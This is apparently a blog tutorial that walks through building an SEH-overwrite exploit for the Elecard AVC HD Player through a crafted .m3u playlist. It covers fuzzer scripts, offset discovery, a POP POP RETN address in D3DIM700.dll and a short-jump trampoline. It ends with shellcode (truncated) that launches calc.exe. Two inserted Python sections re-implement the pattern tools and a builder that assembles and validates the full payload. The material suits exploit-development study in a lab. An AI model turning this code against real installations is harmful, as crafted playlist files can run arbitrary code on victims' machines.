Friday, 18 January 2013

Stack-based Overflow on 'Elecard AVC HD Player'

You will need:
1. Windows XP SP3 (in VirtualBox)
2. The Elecard AVC HD Player application, installed on that Windows machine
3. OllyDbg, also installed on the Windows machine
4. A Python interpreter and some familiarity with Python (here the attacker machine is BackTrack 5)


First, prepare the fuzzer. It writes an .m3u playlist whose first entry is 25000 'A' bytes (0x41), enough to overrun the buffer the player copies the entry into:
#!/usr/bin/python
filename = "crash1.m3u"
head = "#EXTM3U\n"
head += "#EXTINF:153,Artist - song\n"
dead = "\x41" * 25000          # oversized entry: 25000 x 'A'
with open(filename, 'w') as f:
    f.write(head + dead)
print("Successfully created %s" % filename)


Now run Elecard AVC HD Player.

Then open OllyDbg and attach it to the Elecard AVC HD Player process (File -> Attach; choose the MPEG Player process).

Run the fuzzer, open the generated crash1.m3u in the player and look at the result.
To see it, select View -> SEH chain. The exception handler entry has been overwritten with our data (41414141): this is an SEH overwrite, so the handler pointer is what we need to control.


Next, generate a 25000-byte cyclic pattern with pattern_create so the exact overwrite offset can be found:
root@bt:/opt/metasploit/msf3/tools# ./pattern_create.rb 25000

Then paste the pattern into the fuzzer in place of the 'A's:
#!/usr/bin/python
filename = "crash2.m3u"
head = "#EXTM3U\n"
head += "#EXTINF:153,Artist - song\n"
dead = "Aa0Aa1Aa"   # truncated on the page: paste the full 25000-byte pattern_create.rb output here
with open(filename, 'w') as f:
    f.write(head + dead)
print("Successfully created %s" % filename)


After that, restart OllyDbg and Elecard, rerun the fuzzer and open crash2.m3u. The SEH chain now shows a piece of the pattern (33614132) in the handler field.

Feed that value to pattern_offset:
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 33614132
8

So the SEH handler pointer sits 8 bytes into our data (0x33614132 read as little-endian bytes is "2Aa3", which starts at offset 8 of the pattern), and the nSEH field, the 4 bytes just in front of it, is at offset 4.
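As an added example (my own code, not from the original post and not Metasploit's), here is a small Python re-implementation of what pattern_create.rb and pattern_offset.rb do, so the offset of 8 can be reproduced and the little-endian lookup is explicit. The function names are my own. It also shows a caveat: the pattern only has 20280 unique bytes, so with a 25000-byte buffer any value is found twice and the second hit is ambiguous.

```python
#!/usr/bin/env python3
# Added example, not code from the original post or from Metasploit:
# re-creates pattern_create / pattern_offset so the offset found above can
# be checked without the Ruby tools. Function names are my own.
import string
import struct

# One cycle of the Metasploit scheme: upper letter, lower letter, digit.
# 26 * 26 * 10 triplets = 20280 bytes before it repeats.
_BASE = "".join(u + l + d
                for u in string.ascii_uppercase
                for l in string.ascii_lowercase
                for d in string.digits)
UNIQUE_LEN = len(_BASE)


def pattern_create(length):
    """Cyclic pattern 'Aa0Aa1Aa2...' of the given length.

    Beyond UNIQUE_LEN bytes the pattern simply repeats, so offsets past
    20280 can no longer be told apart from offsets near the start."""
    reps = -(-length // UNIQUE_LEN)          # ceiling division
    return (_BASE * reps)[:length]


def pattern_offset(pattern, value):
    """All offsets at which `value` appears in `pattern`.

    `value` may be an int (0x33614132), the hex string the SEH chain view
    shows ("33614132"), or the 4 characters themselves ("2Aa3"). Ints and
    hex strings are converted to the little-endian byte order a 32-bit
    register or handler pointer is stored in."""
    if isinstance(value, str) and len(value) == 8 and \
            all(c in string.hexdigits for c in value):
        value = int(value, 16)
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    else:
        needle = value
    hits, start = [], 0
    while True:
        i = pattern.find(needle, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


if __name__ == "__main__":
    pat = pattern_create(25000)
    # the SEH handler field showed 33614132 -> "2Aa3" -> offset 8, and,
    # because 25000 > 20280, a second (ambiguous) hit one cycle later
    print(pattern_offset(pat, "33614132"))
```

The first hit, 8, is the one pattern_offset.rb reported; the second exists only because the 25000-byte pattern wraps. Keep fuzz buffers at or below 20280 bytes, or use the second hit as a warning rather than an answer, when the crash value could plausibly sit deep in the buffer.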

Let's check the offset by modifying the fuzzer: 4 bytes of padding, 4 marker bytes (0xBB), and NOPs for the rest:
#!/usr/bin/python
filename = "crash3.m3u"
head = "#EXTM3U\n"
head += "#EXTINF:153,Artist - song\n"
dead = "\x90" * 4              # offset 0-3: padding
dead += "\xBB\xBB\xBB\xBB"      # offset 4-7: marker bytes (the nSEH field); the handler pointer at offset 8 receives NOPs
dead += "\x90" * (25000 - len(dead))
with open(filename, 'w') as f:
    f.write(head + dead)
print("Successfully created %s" % filename)

Look at the SEH chain again to confirm which field the marker bytes and the NOPs landed in.

Next we need a module to return through. Click View -> Executable modules; all loaded modules appear. Here D3DIM700.dll is used. Double-click the module.
Once the CPU window shows D3DIM700.dll, right-click -> Search for -> Sequence of commands, fill in the sequence below and click Find:
POP r32
POP r32
RETN

OllyDbg will point to an address in D3DIM700.dll holding the instruction sequence POP, POP, RETN.
We now have the address 7394A0A6. The module matters: on XP SP3 a handler address in a module compiled with SafeSEH is rejected before it is called, so the address has to come from a module without a SafeSEH table; the fact that the exploit below works shows D3DIM700.dll qualifies.

Insert the address into the fuzzer, little-endian:
#!/usr/bin/python
filename = "crash3.m3u"
head = "#EXTM3U\n"
head += "#EXTINF:153,Artist - song\n"
dead = "\x90" * 4              # offset 0-3: padding
dead += "\xcc\xcc\xcc\xcc"      # offset 4-7: nSEH, INT3 breakpoints for now
dead += "\xA6\xA0\x94\x73"      # offset 8-11: SEH handler = 0x7394A0A6 (POP POP RETN in D3DIM700.dll), little-endian
dead += "\x90" * (22000 - len(dead))
with open(filename, 'w') as f:
    f.write(head + dead)
print("Successfully created %s" % filename)

Set a breakpoint on the POP POP RETN address in D3DIM700.dll (select the line and press F2), then run the fuzzer and open the file in the player under OllyDbg. The access violation stops the debugger first.

Next press Shift+F9 to pass the exception to the program. OllyDbg continues into the handler and stops at our breakpoint; in the CPU window on the left you can watch POP, POP, RETN execute, and the RETN lands on our nSEH bytes at offset 4 (the INT3s).
The problem is that only the 4-byte nSEH field sits in front of the handler address: far too little room for shellcode.


Modify the fuzzer again: replace the INT3s in nSEH with a short jump over the handler address. EB 06 is JMP SHORT +6, measured from the end of the 2-byte instruction, so from offset 6 it lands at offset 12, just past the 4-byte handler address:
#!/usr/bin/python
filename = "crash3.m3u"
head = "#EXTM3U\n"
head += "#EXTINF:153,Artist - song\n"
dead = "\x90" * 4              # offset 0-3: padding
dead += "\xeb\x06\x90\x90"      # offset 4-7: nSEH = JMP SHORT +6, padded to 4 bytes
dead += "\xA6\xA0\x94\x73"      # offset 8-11: SEH handler = 0x7394A0A6 (POP POP RETN in D3DIM700.dll)
dead += "\x90" * (22000 - len(dead))   # offset 12 onward: NOP sled the jump lands in
with open(filename, 'w') as f:
    f.write(head + dead)
print("Successfully created %s" % filename)

The next step is to create the shellcode. Open a terminal and run the command shown in the screenshot:

Copy the IP address into your web browser; the generator page shown in the screenshot appears.

After clicking Generate, insert the payload into the fuzzer behind a 16-byte NOP sled:
#!/usr/bin/python
filename = "crashcalc.m3u"
head = "#EXTM3U\n"
head += "#EXTINF:153,Artist - song\n"
dead = "\x90" * 4              # offset 0-3: padding
dead += "\xeb\x06\x90\x90"      # offset 4-7: nSEH = JMP SHORT +6 over the handler address
dead += "\xA6\xA0\x94\x73"      # offset 8-11: SEH handler = 0x7394A0A6 (POP POP RETN in D3DIM700.dll)
dead += "\x90" * 16             # offset 12-27: NOP sled the jump lands in
dead += "\x29\xc9\x83\xe9\xde"  # calc.exe shellcode, truncated on the page: paste the full generated payload here
dead += "\x90" * (25000 - len(dead))
with open(filename, 'w') as f:
    f.write(head + dead)
print("Successfully created %s" % filename)
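The final layout (4 bytes of padding, JMP SHORT in nSEH, the POP POP RETN address in SEH, a NOP sled, then the shellcode) is easy to get one byte wrong. As an added example, not code from the original post, this Python script assembles that layout, checks the jump displacement and the handler bytes before writing the .m3u, and screens for the line-ending bytes an m3u parser would cut the entry on. It uses the offsets and the D3DIM700.dll address found above; the shellcode is a constructed INT3 stand-in rather than the calc.exe payload, and the function names are my own.

```python
#!/usr/bin/env python3
# Added example, not code from the original post: assemble the same SEH
# payload layout as the final fuzzer and check its geometry before writing
# the .m3u. The offsets (nSEH at 4, handler at 8) and the POP/POP/RETN
# address 0x7394A0A6 in D3DIM700.dll are the ones found above; the shellcode
# used in main() is a constructed INT3 stand-in, not the calc.exe payload.
import struct

HEAD = b"#EXTM3U\n#EXTINF:153,Artist - song\n"
NSEH_OFFSET = 4                 # pattern_offset reported the handler at 8, so nSEH is at 4
SEH_OFFSET = NSEH_OFFSET + 4
POP_POP_RET = 0x7394A0A6        # POP r32 / POP r32 / RETN inside D3DIM700.dll
TOTAL_LEN = 25000
BAD_BYTES = b"\x00\x0a\x0d"     # an .m3u is line based: CR/LF (and NUL) would cut the entry short


def short_jmp(displacement):
    """EB xx, padded to fill the 4-byte nSEH field.

    The displacement is relative to the end of the 2-byte instruction, so a
    jump placed at nSEH lands at NSEH_OFFSET + 2 + displacement."""
    if not -128 <= displacement <= 127:
        raise ValueError("JMP SHORT displacement must fit in a signed byte")
    return b"\xeb" + struct.pack("<b", displacement) + b"\x90\x90"


def build(shellcode, sled=16, total=TOTAL_LEN):
    """Return the entry body: padding | nSEH | SEH | NOP sled | shellcode | filler."""
    body = b"\x90" * NSEH_OFFSET
    body += short_jmp(6)                        # nSEH: jump over the 4-byte handler address
    body += struct.pack("<I", POP_POP_RET)      # SEH: handler address, little-endian
    body += b"\x90" * sled                      # the jump lands here
    body += shellcode
    if len(body) > total:
        raise ValueError("shellcode too long for the %d-byte entry" % total)
    return body + b"\x90" * (total - len(body))


def landing_offset(body):
    """Offset the short jump stored in nSEH transfers control to."""
    if body[NSEH_OFFSET] != 0xEB:
        raise ValueError("nSEH does not hold a JMP SHORT")
    disp = struct.unpack("<b", body[NSEH_OFFSET + 1:NSEH_OFFSET + 2])[0]
    return NSEH_OFFSET + 2 + disp


def check(body, shellcode):
    """Verify the layout the way the debugger session above did by hand."""
    handler = struct.unpack("<I", body[SEH_OFFSET:SEH_OFFSET + 4])[0]
    if handler != POP_POP_RET:
        raise ValueError("handler field is %08x, expected %08x" % (handler, POP_POP_RET))
    land = landing_offset(body)
    sc_at = body.find(shellcode)
    if land < SEH_OFFSET + 4:
        raise ValueError("jump does not clear the handler address")
    if sc_at < 0 or land > sc_at or any(b != 0x90 for b in body[land:sc_at]):
        raise ValueError("jump does not land in the NOP sled in front of the shellcode")
    for bad in BAD_BYTES:
        if bytes([bad]) in body:
            raise ValueError("bad byte %02x in payload" % bad)
    return True


def write_m3u(path, body):
    with open(path, "wb") as f:
        f.write(HEAD + body)


if __name__ == "__main__":
    # constructed stand-in shellcode: 8 x INT3, so a debugger stops exactly
    # where the real payload would begin
    sc = b"\xcc" * 8
    payload = build(sc)
    check(payload, sc)
    write_m3u("crash_check.m3u", payload)
    print("jump lands at offset %d, shellcode at %d"
          % (landing_offset(payload), payload.find(sc)))
```

Run it once with the INT3 stand-in under OllyDbg: after Shift+F9 the debugger should stop at offset 28 of the entry, which proves the jump and the sled before the real payload is pasted in. The bad-byte screen is worth keeping even though the generated calc.exe payload was already encoded to avoid NUL, CR and LF, because the handler address and NOPs are not run through the encoder.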

Now open Elecard AVC HD Player without OllyDbg, run the fuzzer and open crashcalc.m3u.
Look what happens:
Elecard AVC HD Player becomes a calculator :-)

Good Luck !!!
